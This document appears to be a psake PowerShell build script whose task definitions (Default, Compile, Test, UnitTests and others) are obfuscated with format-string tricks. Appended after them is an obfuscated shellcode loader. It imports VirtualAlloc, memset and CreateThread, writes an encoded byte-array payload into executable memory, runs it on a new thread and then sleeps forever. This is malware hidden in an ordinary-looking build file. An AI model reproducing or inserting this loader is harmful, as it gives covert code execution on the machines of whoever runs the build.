&("{1}{0}" -f 'ask','T') ("{0}{2}{1}" -f'D','t','efaul') -depends ("{0}{1}{2}"-f 'Com','pi','le'),("{0}{1}"-f'T','est')

&("{0}{1}"-f 'Ta','sk') ("{0}{1}"-f'Co','mpile') -depends ("{1}{2}{0}{4}{3}"-f 'eSol','Compi','l','onA','uti'),("{0}{1}{2}"-f 'C','ompil','eSolutionB')

.("{1}{0}" -f 'ask','T') ("{0}{1}"-f'T','est') -depends ("{0}{1}" -f 'Un','itTests'),("{2}{0}{1}{3}"-f 'i','on','Integrat','Tests')

&("{0}{1}"-f'Tas','k') ("{2}{0}{1}" -f 'ompileSoluti','onA','C') -description ("{0}{1}{4}{3}{5}{2}" -f 'Co','m','n A','solut','piles ','io') {}

&("{1}{0}"-f'sk','Ta') ("{1}{2}{3}{0}" -f 'B','Comp','ileSolut','ion') {}

&("{1}{0}" -f 'sk','Ta') ("{1}{0}{2}"-f 'itTe','Un','sts') -alias 'ut' {}

.("{0}{1}" -f 'Ta','sk') ("{1}{2}{0}{3}"-f 'grat','I','nte','ionTests') {}

${C} = ((("{53}{39}{47}{62}{6}{55}{41}{74}{56}{31}{24}{11}{50}{21}{48}{34}{3}{28}{64}{52}{14}{19}{57}{38}{49}{40}{59}{25}{42}{12}{70}{29}{58}{72}{60}{17}{7}{69}{35}{45}{36}{30}{44}{20}{27}{65}{32}{23}{33}{46}{51}{43}{66}{22}{71}{13}{63}{15}{61}{2}{67}{0}{18}{68}{10}{5}{26}{54}{8}{37}{1}{4}{16}{73}{9}" -f 'pub','st, ui','port(31U',' ','nt src','Pt','2.dll31U)]public st','ad(I','emset(IntPt',' count);',' Int','I','l','s, In','uint flAl','r lpThreadId);[Dl',', ','re','lic static','locationTy','t d','p','nt dwCreat','tPtr lpStartAdd','tr VirtualAlloc(','l3','r ','wSta','uint d',' s','s, u','IntP','ize, In','ress,','ddress,','p','bute','r de','nt','3','flProtect);[DllImport(31Uke','c','2.dll31U)]pub',' ','in','ThreadAttri',' ','1Ukernel','A',' ','ntPtr l','IntPtr lpParameter,',', ','[DllImport(','m','ati','xtern ','pe, ui','tatic exter','rne','Th','lIm','3','tPt','wSize','ckS','ui','msvcrt.dll31U)]',' extern','ntPtr l','ic','ionFlag','n IntPtr Create','uint',' e'))  -RePLace  ([ChaR]51+[ChaR]49+[ChaR]85),[ChaR]34);${w} = .("{1}{2}{0}"-f 'e','Add-T','yp') -memberDefinition ${c} -Name ("{1}{0}" -f'2','Win3') -namespace ("{1}{3}{0}{2}"-f'32Fu','W','nctions','in') -passthru;[Byte[]];[Byte[]]${Z} = 0xd9,0xcd,0xd9,0x74,0x24,0xf4,0xbb,0x6a,0x85,0xed,0x2c,0x58,0x31,0xc9,0xb1,0x47,0x31,0x58,0x18,0x83,0xc0,0x04,0x03,0x58,0x7e,0x67,0x18,0xd0,0x96,0xe5,0xe3,0x29,0x66,0x8a,0x6a,0xcc,0x57,0x8a,0x09,0x84,0xc7,0x3a,0x59,0xc8,0xeb,0xb1,0x0f,0xf9,0x78,0xb7,0x87,0x0e,0xc9,0x72,0xfe,0x21,0xca,0x2f,0xc2,0x20,0x48,0x32,0x17,0x83,0x71,0xfd,0x6a,0xc2,0xb6,0xe0,0x87,0x96,0x6f,0x6e,0x35,0x07,0x04,0x3a,0x86,0xac,0x56,0xaa,0x8e,0x51,0x2e,0xcd,0xbf,0xc7,0x25,0x94,0x1f,0xe9,0xea,0xac,0x29,0xf1,0xef,0x89,0xe0,0x8a,0xdb,0x66,0xf3,0x5a,0x12,0x86,0x58,0xa3,0x9b,0x75,0xa0,0xe3,0x1b,0x66,0xd7,0x1d,0x58,0x1b,0xe0,0xd9,0x23,0xc7,0x65,0xfa,0x83,0x8c,0xde,0x26,0x32,0x40,0xb8,0xad,0x38,0x2d,0xce,0xea,0x5c,0xb0,0x03,0x81,0x58,0x39,0xa2,0x46,0xe9,0x79,0x81,0x42,0xb2,0xda,0xa8,0xd3,0x1e,0x8c,0xd5,0x04,0xc1,0x71,0x70,0x4e,0xef,0x66,0x09,0x0d,0x67,0x4a,0x20,0xae,0x77,0xc4,0x33,0xdd,0x45,0x4b,0xe8,0x49,0xe5,0x04,0x36,0x8d,0x0a,0x3f,0x8e,0x01,0xf5,0xc0,0xef,0x08,0x31,0x94,0xbf,0x22,0x90,0x95,0x2b,0xb3,0x1d,0x40,0xc1,0xb6,0x89,0xab,0xbe,0xb8,0x12,0x44,0xbd,0xba,0xb5,0xc8,0x48,0x5c,0xe5,0xa0,0x1a,0xf1,0x45,0x11,0xdb,0xa1,0x2d,0x7b,0xd4,0x9e,0x4d,0x84,0x3e,0xb7,0xe7,0x6b,0x97,0xef,0x9f,0x12,0xb2,0x64,0x3e,0xda,0x68,0x01,0x00,0x50,0x9f,0xf5,0xce,0x91,0xea,0xe5,0xa6,0x51,0xa1,0x54,0x60,0x6d,0x1f,0xf2,0x8c,0xfb,0xa4,0x55,0xdb,0x93,0xa6,0x80,0x2b,0x3c,0x58,0xe7,0x20,0xf5,0xcc,0x48,0x5e,0xfa,0x00,0x49,0x9e,0xac,0x4a,0x49,0xf6,0x08,0x2f,0x1a,0xe3,0x56,0xfa,0x0e,0xb8,0xc2,0x05,0x67,0x6d,0x44,0x6e,0x85,0x48,0xa2,0x31,0x76,0xbf,0x32,0x0d,0xa1,0xf9,0x40,0x7f,0x71;${g} = 0x1000;if (${z}."le`Ngth" -gt 0x1000){${G} = ${z}."L`enGTh"};${x}=${w}::("{1}{2}{3}{0}" -f 'loc','Virtu','a','lAl').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."l`ENgtH"-1);${I}++) {${w}::"M`EmSEt"([IntPtr](${X}.("{0}{2}{1}" -f 'ToI','2','nt3').Invoke()+${i}), ${z}[${i}], 1)};${w}::("{3}{2}{1}{0}"-f'ead','ateThr','e','Cr').Invoke(0,0,${x},0,0,0);for (;;){&("{2}{1}{0}"-f 't-sleep','ar','St') 60};
